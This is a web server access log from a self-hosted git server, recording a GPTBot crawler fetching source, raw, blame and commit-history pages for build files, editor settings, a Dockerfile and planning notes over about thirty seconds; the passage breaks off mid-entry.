"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14641] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20386] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11100] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20385] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20382] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10021] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20383] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10930] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11750] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" +[17/Feb/2026:15:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10959] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11054] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" +[17/Feb/2026:15:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10092] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12466] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20375] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:19:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:15:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/" +[17/Feb/2026:15:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:15:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10959] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10063] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9502] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:15:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9925] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +[17/Feb/2026:15:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 